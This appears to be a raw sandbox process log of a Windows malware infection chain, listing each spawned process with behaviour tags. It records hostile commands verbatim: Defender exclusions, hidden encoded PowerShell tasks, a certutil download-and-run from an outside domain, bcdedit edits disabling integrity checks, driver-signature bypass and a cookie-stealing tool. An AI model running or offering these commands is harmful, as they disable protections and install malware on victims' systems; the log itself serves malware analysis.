\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
30⤵
PID:5856

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
30⤵
PID:7228

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOHnIvVRd" /SC once /ST 11:13:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
28⤵
- Creates scheduled task(s)
PID:5988

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOHnIvVRd"
28⤵
PID:7844

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOHnIvVRd"
28⤵
PID:12412

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\bRoENFo.exe\" nh /site_id 754 /S" /V1 /F
28⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:12196

C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\hjjgaa.exe" /Verysilent
20⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
21⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
21⤵
PID:10564

C:\Users\Admin\AppData\Local\Temp\pwe2lb3o4c4\xw204n1ofqr.exe
"C:\Users\Admin\AppData\Local\Temp\pwe2lb3o4c4\xw204n1ofqr.exe" /ustwo INSTALL
16⤵
- Executes dropped EXE
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 648
17⤵
- Drops file in Windows directory
- Program crash
PID:7036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 664
17⤵
- Program crash
PID:4756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 764
17⤵
- Program crash
PID:5736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 800
17⤵
- Program crash
PID:6924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 880
17⤵
- Program crash
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 956
17⤵
- Program crash
PID:8088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 1088
17⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:8144

C:\Users\Admin\AppData\Local\Temp\5vxvsbsxcne\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\5vxvsbsxcne\AwesomePoolU1.exe"
16⤵
- Executes dropped EXE
PID:4932

C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe
"C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe" /VERYSILENT /id=535
16⤵
- Executes dropped EXE
PID:4972

C:\Users\Admin\AppData\Local\Temp\is-GMUTH.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GMUTH.tmp\vict.tmp" /SL5="$30374,870426,780800,C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe" /VERYSILENT /id=535
17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5316

C:\Users\Admin\AppData\Local\Temp\is-N2JME.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-N2JME.tmp\wimapi.exe" 535
18⤵
- Executes dropped EXE
PID:5860

C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe
"C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"
19⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7268

C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe
"C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"
20⤵
- Executes dropped EXE
- Checks processor information in registry
PID:7820

C:\Users\Admin\AppData\Local\Temp\43bouh4fhun\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\43bouh4fhun\askinstall24.exe"
16⤵
- Executes dropped EXE
PID:412

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:5844

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:6120

C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe" /silent /subid=482
16⤵
- Executes dropped EXE
PID:5156

C:\Users\Admin\AppData\Local\Temp\is-92BSA.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-92BSA.tmp\vpn.tmp" /SL5="$4032C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe" /silent /subid=482
17⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
18⤵
PID:6536

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
19⤵
PID:7048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
18⤵
PID:8204

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
19⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
PID:8380

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9344

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10744

C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
16⤵
- Executes dropped EXE
PID:5144

C:\Users\Admin\AppData\Local\Temp\is-2J4TE.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2J4TE.tmp\IBInstaller_97039.tmp" /SL5="$30328,14597143,721408,C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
17⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5368

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
18⤵
- Checks computer location settings
PID:5616

C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe"
18⤵
- Executes dropped EXE
PID:5636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe"
19⤵
PID:8552

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
20⤵
- Runs ping.exe
PID:8612

C:\Users\Admin\AppData\Local\Temp\r1ro5y1grzo\app.exe
"C:\Users\Admin\AppData\Local\Temp\r1ro5y1grzo\app.exe" /8-23
16⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Black-Haze"
17⤵
PID:5504

C:\Program Files (x86)\Black-Haze\7za.exe
"C:\Program Files (x86)\Black-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z
17⤵
- Executes dropped EXE
PID:7608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Black-Haze\app.exe" -map "C:\Program Files (x86)\Black-Haze\WinmonProcessMonitor.sys""
17⤵
PID:8024

C:\Program Files (x86)\Black-Haze\app.exe
"C:\Program Files (x86)\Black-Haze\app.exe" -map "C:\Program Files (x86)\Black-Haze\WinmonProcessMonitor.sys"
18⤵
- Suspicious behavior: LoadsDriver
PID:8128

C:\Program Files (x86)\Black-Haze\7za.exe
"C:\Program Files (x86)\Black-Haze\7za.exe" e -p154.61.71.51 winamp.7z
17⤵
PID:8308

C:\Program Files (x86)\Black-Haze\app.exe
"C:\Program Files (x86)\Black-Haze\app.exe" /8-23
17⤵
PID:7328

C:\Program Files (x86)\Black-Haze\app.exe
"C:\Program Files (x86)\Black-Haze\app.exe" /8-23
18⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5136

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
19⤵
PID:11260

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
20⤵
PID:11392

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
19⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:11684

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
20⤵
- Creates scheduled task(s)
PID:11964

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
20⤵
- Creates scheduled task(s)
PID:12440

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
20⤵
- Loads dropped DLL
PID:13460

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
21⤵
- Modifies boot configuration data using bcdedit
PID:12948

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
21⤵
- Modifies boot configuration data using bcdedit
PID:13188

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
21⤵
- Modifies boot configuration data using bcdedit
PID:12800

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
21⤵
- Modifies boot configuration data using bcdedit
PID:13088

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
21⤵
- Modifies boot configuration data using bcdedit
PID:13576

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
21⤵
- Modifies boot configuration data using bcdedit
PID:13260

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
21⤵
- Modifies boot configuration data using bcdedit
PID:13208

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
21⤵
- Modifies boot configuration data using bcdedit
PID:13400

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
21⤵
- Modifies boot configuration data using bcdedit
PID:7772

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
21⤵
- Modifies boot configuration data using bcdedit
PID:14016

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
21⤵
- Modifies boot configuration data using bcdedit
PID:14304

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
21⤵
- Modifies boot configuration data using bcdedit
PID:13884

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
21⤵
- Modifies boot configuration data using bcdedit
PID:14084

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
21⤵
- Modifies boot configuration data using bcdedit
PID:7672

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
20⤵
- Modifies boot configuration data using bcdedit
PID:14204

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
20⤵
- Drops file in Drivers directory
PID:15084

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
20⤵
PID:6080

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
21⤵
PID:1924

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
22⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
20⤵
PID:10912

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
20⤵
PID:9556

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
21⤵
PID:11092

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
20⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
21⤵
PID:15916

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
20⤵
PID:11576

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
21⤵
PID:13548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=3da84874-5b8d-41cf-9b6d-93383f79a12d&browser=chrome
22⤵
PID:13680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc40fa6e00,0x7ffc40fa6e10,0x7ffc40fa6e20
23⤵
PID:13348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:1
23⤵
PID:13400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:1
23⤵
PID:13244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1692 /prefetch:8
23⤵
PID:12492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
23⤵
PID:12060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
23⤵
PID:14004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
23⤵
PID:10284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
23⤵
PID:14100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
23⤵
PID:14412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:8
23⤵
PID:8640

C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
20⤵
PID:9856

C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
20⤵
PID:11332

C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
20⤵
PID:11168

C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe
"C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe" ll
13⤵
- Executes dropped EXE
PID:16444

C:\Users\Admin\AppData\Local\Temp\is-3TBB0.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3TBB0.tmp\setups.tmp" /SL5="$6014E,549376,61440,C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe" ll
14⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:16500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exe /S /kr /site_id=754 & exit
11⤵
PID:16432

C:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exe
C:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exe /S /kr /site_id=754
12⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:16672

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
13⤵
PID:17088

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
14⤵
PID:2096

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
15⤵
PID:17272

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
15⤵
PID:17328

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZxBIsKhi" /SC once /ST 13:39:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
13⤵
- Creates scheduled task(s)
PID:3100

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gZxBIsKhi"
13⤵
PID:4156

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gZxBIsKhi"
13⤵
PID:6180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exe\" nh /site_id 754 /S" /V1 /F
13⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6392

C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\hjjgaa.exe" /Verysilent
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:15888

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:16056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:6812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:16852

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:16920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4232

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4268

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6740

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7080

